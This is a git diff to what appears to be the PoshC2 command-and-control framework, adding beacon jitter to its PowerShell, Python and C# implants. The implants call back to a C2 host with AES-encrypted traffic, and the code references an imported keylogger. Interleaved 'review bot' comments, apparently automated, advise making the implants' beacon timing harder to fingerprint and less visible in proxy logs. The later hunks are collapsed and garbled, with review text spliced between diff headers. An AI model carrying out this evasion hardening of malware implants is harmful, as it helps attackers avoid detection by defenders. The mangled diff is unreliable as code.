diff --git a/Config.py b/Config.py
index 7ddeced..1c624ad 100644
--- a/Config.py
+++ b/Config.py
@@ -9,6 +9,7 @@ ROOTDIR = "/opt/PoshC2_Project/"
 HostnameIP = "https://192.168.233.1"
 DomainFrontHeader = "" # example df.azureedge.net
 DefaultSleep = "5s"
+Jitter = 0.20
 KillDate = "08/06/2019"
 UserAgent = "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko"
 urlConfig = UrlConfig("%soldurls.txt" % POSHDIR) # Instantiate UrlConfig object - old urls using a list from a text file
diff --git a/Files/Implant-Core.ps1 b/Files/Implant-Core.ps1
index b329a86..3f25544 100644
--- a/Files/Implant-Core.ps1
+++ b/Files/Implant-Core.ps1
@@ -1,4 +1,5 @@
 $key="%s"
+$jitter=%s
 Function Beacon($sleeptime) {
 if ($sleeptime.ToLower().Contains('m')) {
 $sleeptime = $sleeptime -replace 'm', ''
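Review bot: `Jitter = 0.20` is interpolated verbatim into three implant templates but nothing constrains its range, and each implant fails differently outside 0 <= Jitter < 1: the PowerShell loop falls back to a fixed 5 s sleep on a negative value, the Python implant's `random.randint` call raises, and the C# `Random.Next`/`WaitOne` pair rejects an inverted or negative interval. A comment plus a load-time check would catch a typo before any payload is generated, e.g. `Jitter = 0.20  # fraction of the beacon interval to randomise by; must satisfy 0 <= Jitter < 1` followed by `if not 0 <= Jitter < 1: raise ValueError("Jitter must be in [0, 1)")`. The Python and C# behaviour is read from the other hunks in this diff; the exact failure path on the Python side depends on an `except` clause that is outside its hunk.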
@@ -119,17 +120,17 @@ function Encrypt-String($key, $unencryptedString) {
 [System.Convert]::ToBase64String($fullData)
 }
 function Encrypt-Bytes($key, $bytes) {
- [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
- $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
- $gzipStream.Write( $bytes, 0, $bytes.Length )
- $gzipStream.Close()
- $bytes = $output.ToArray()
- $output.Close()
- $aesManaged = Create-AesManagedObject $key
- $encryptor = $aesManaged.CreateEncryptor()
- $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
- [byte[]] $fullData = $aesManaged.IV + $encryptedData
- $fullData
+ [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
+ $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
+ $gzipStream.Write( $bytes, 0, $bytes.Length )
+ $gzipStream.Close()
+ $bytes = $output.ToArray()
+ $output.Close()
+ $aesManaged = Create-AesManagedObject $key
+ $encryptor = $aesManaged.CreateEncryptor()
+ $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
+ [byte[]] $fullData = $aesManaged.IV + $encryptedData
+ $fullData
 }
 function Decrypt-String($key, $encryptedStringWithIV) {
 $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)
@@ -188,7 +189,7 @@ while($true)
 $date = [datetime]::ParseExact($date,"dd/MM/yyyy",$null)
 $killdate = [datetime]::ParseExact("%s","dd/MM/yyyy",$null)
 if ($killdate -lt $date) {exit}
- $sleeptimeran = $sleeptime, ($sleeptime * 1.1), ($sleeptime * 0.9)
+ $sleeptimeran = $sleeptime, ($sleeptime * (1 + $Jitter)), ($sleeptime * (1 - $Jitter))
 $newsleep = $sleeptimeran|get-random
 if ($newsleep -lt 1) {$newsleep = 5}
 start-sleep $newsleep
diff --git a/Files/Implant-Core.py b/Files/Implant-Core.py
index 1a3a7a4..9e57203 100644
--- a/Files/Implant-Core.py
+++ b/Files/Implant-Core.py
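Review bot: The new `$sleeptimeran` line still picks from exactly three fixed intervals (`$sleeptime`, x1.2 and x0.8 with the default), so the beacon period remains easy to fingerprint on the wire, while the Python and C# implants in this same diff draw a uniform value across the whole +/-jitter range. Drawing the same way here keeps the three implants consistent and replaces the list-and-pick pair with one line: `$newsleep = Get-Random -Minimum ($sleeptime * (1 - $jitter)) -Maximum ($sleeptime * (1 + $jitter))`. The reference `$Jitter` resolves to the `$jitter` declared in the first hunk only because PowerShell variable names are case-insensitive; one spelling saves a reader hunting for a second variable. `$sleeptime`'s type is not visible here, so whether `Get-Random` returns an int or a double, and how `start-sleep` coerces it, should be confirmed; the `while($true)` body continues outside the hunk.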
@@ -15,6 +15,7 @@ urls = [%s] kd=time.strptime("%s","%%d/%%m/%%Y") useragent = "" imbase = "%s" +jitter = %s def keylog(): # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/modules/python/collection/osx/keylogger.py @@ -96,7 +97,8 @@ while(True): uri = "%s" server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) try: - time.sleep(timer) + this_timer = random.randint(timer * (1 - jitter), timer * (1 + jitter)) + time.sleep(this_timer) ua='%s' if hh: req=urllib2.Request(server,headers={'Host':hh,'User-agent':ua}) else: req=urllib2.Request(server,headers={'User-agent':ua}) diff --git a/Files/dropper.cs b/Files/dropper.cs index 41245c5..ca28fdb 100644 --- a/Files/dropper.cs +++ b/Files/dropper.cs @@ -210,6 +210,10 @@ public class Program m = re.Match(x); var Sleep = m.Groups[1].ToString(); + re = new Regex("JITTER2025(.*)5202RETTIJ"); + m = re.Match(x); + var Jitter = m.Groups[1].ToString(); + re = new Regex("NEWKEY8839394(.*)4939388YEKWEN"); m = re.Match(x); var NewKey = m.Groups[1].ToString(); @@ -218,7 +222,7 @@ public class Program m = re.Match(x); var IMGs = m.Groups[1].ToString(); - ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs); + ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs, Jitter); } } @@ -365,7 +369,7 @@ public class Program } } - static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS) + static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS, string Jitter) { UrlGen.Init(stringURLS, RandomURI, baseURL); ImgGen.Init(stringIMGS); 
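Review bot: `random.randint(timer * (1 - jitter), timer * (1 + jitter))` raises for most beacon intervals because `randint` requires integral bounds: with the default 0.2 a 7 s timer gives 5.6 and 8.4, and Python 2's `randrange` rejects a non-integral float with ValueError. The call sits inside the `try:`, so if the `except` below (outside the hunk) swallows the error the sleep is skipped and the implant beacons in a tight loop, which is both unstable and very visible in a proxy log. `random.uniform` takes float bounds and `time.sleep` accepts a float: `this_timer = random.uniform(timer * (1 - jitter), timer * (1 + jitter))`. This assumes `timer` is numeric, as the removed `time.sleep(timer)` implies; its assignment is outside the hunk.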
@@ -381,7 +385,7 @@ public class Program Console.SetOut(strOutput); var exitvt = new ManualResetEvent(false); var output = new StringBuilder(); - while (!exitvt.WaitOne((int)(beacontime * 1000 * (((new Random()).Next(0, 2) > 0) ? 1.05 : 0.95)))) + while (!exitvt.WaitOne((int)(new Random().Next((int)(beacontime * 1000 * (1F - Double.Parse(Jitter))), (int)(beacontime * 1000 * (1F + Double.Parse(Jitter))))))) { if (Convert.ToDateTime(KillDate) < DateTime.Now) { diff --git a/Implant.py b/Implant.py index 40bd05a..ae9dbf5 100644 --- a/Implant.py +++ b/Implant.py @@ -2,7 +2,7 @@ from Colours import Colours from Utils import randomuri, gen_key -from Config import PayloadsDirectory, FilesDirectory +from Config import PayloadsDirectory, FilesDirectory, Jitter from DB import select_item, get_defaultbeacon, get_killdate, get_dfheader, get_otherbeaconurls, get_defaultuseragent, new_implant, new_task, update_mods, get_autoruns from Core import get_images @@ -28,6 +28,7 @@ class Implant(object): self.UserAgent = get_defaultuseragent() self.Sleep = get_defaultbeacon() self.ModsLoaded = "" + self.Jitter = Jitter self.ImplantID = "" self.Pivot = pivot self.KillDate = get_killdate() 
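Review bot: `Double.Parse(Jitter)` inside the `while` condition is culture-sensitive, so the `0.2` the server writes into the `JITTER2025…` marker is misread or rejected with FormatException on a host whose current culture uses a comma decimal separator, and the same call throws if the marker was missing and the earlier `Regex` match left `Jitter` empty. It is also parsed twice per loop iteration and never range-checked, although an inverted interval makes `Random.Next` throw and a negative timeout makes `WaitOne` throw. Parse once before the loop with the invariant culture, fall back to a default on failure, and reuse one `Random` instance; the sketch below does that, with a 0.05 fallback mirroring the +/-5 % the removed line used. `beacontime` is declared outside the hunk, so its type (and whether the millisecond product can exceed int range) should be confirmed.
```csharp
// Parse once, culture-invariant, and clamp: an out-of-range value would hand
// Random.Next an inverted interval or WaitOne a negative timeout.
double jitter;
if (!Double.TryParse(Jitter, System.Globalization.NumberStyles.Float, System.Globalization.CultureInfo.InvariantCulture, out jitter) || jitter < 0 || jitter >= 1)
{
    jitter = 0.05;
}
var rng = new Random();
int minWait = (int)(beacontime * 1000 * (1 - jitter));
int maxWait = (int)(beacontime * 1000 * (1 + jitter));
while (!exitvt.WaitOne(rng.Next(minWait, maxWait)))
{
    // … unchanged: kill-date check and tasking loop …
```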
@@ -39,16 +40,17 @@ RANDOMURI19901%s10991IRUMODNAR URLS10484390243%s34209348401SLRU KILLDATE1665%s5661ETADLLIK SLEEP98001%s10089PEELS +JITTER2025%s5202RETTIJ NEWKEY8839394%s4939388YEKWEN -IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Key, self.AllBeaconImages) +IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Jitter, self.Key, self.AllBeaconImages) with open("%spy_dropper.sh" % (PayloadsDirectory), 'rb') as f: self.PythonImplant = base64.b64encode(f.read()) py_implant_core = open("%s/Implant-Core.py" % FilesDirectory, 'r').read() - self.PythonCore = py_implant_core % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Key, self.RandomURI, self.UserAgent) + self.PythonCore = py_implant_core % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Jitter, self.Key, self.RandomURI, self.UserAgent) ps_implant_core = open("%s/Implant-Core.ps1" % FilesDirectory, 'r').read() - self.PSCore = ps_implant_core % (self.Key, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs) -#Add all db elements + self.PSCore = ps_implant_core % (self.Key, self.Jitter, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs) #Add all db elements def display(self): + #Add all db elements def display(self): print Colours.GREEN,"" it = self.Pivot diff --git a/changelog.txt b/changelog.txt index bb6fa76..2929d59 100644 --- a/changelog.txt +++ b/changelog.txt @@ -10,6 +10,7 @@ Add ability to upload a file to an ADS Update BloodHound Pull out unpatched payloads into file for easy management Add base64 encoded versions of the shellcode to the payloads directory +Add a configurable jitter to all implants 4.8 (13/02/19) ==============
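Review bot: The three `%` tuples now carry eight to ten positional values each and this hunk extends every one of them by hand; a wrong position would still render, e.g. swapping `self.Jitter` and `self.Key` would ship `0.2` as the AES key, and nothing in the build would notice. The orders shown agree with the placeholders visible in this diff (`$key` then `$jitter` at the top of Implant-Core.ps1, `imbase` then `jitter` in Implant-Core.py), but most placeholders of both templates lie outside the hunks, so the remaining positions should be checked against the template files. A one-line comment above each call naming the order, such as `# placeholder order in Implant-Core.ps1: key, jitter, sleep, images, uri, uri, killdate, urls`, makes the next addition safer; named `%(jitter)s` placeholders would remove the coupling entirely. The collapsed text also appears to move the `#Add all db elements` comment; its final placement is not recoverable here and it looks unrelated to the jitter change.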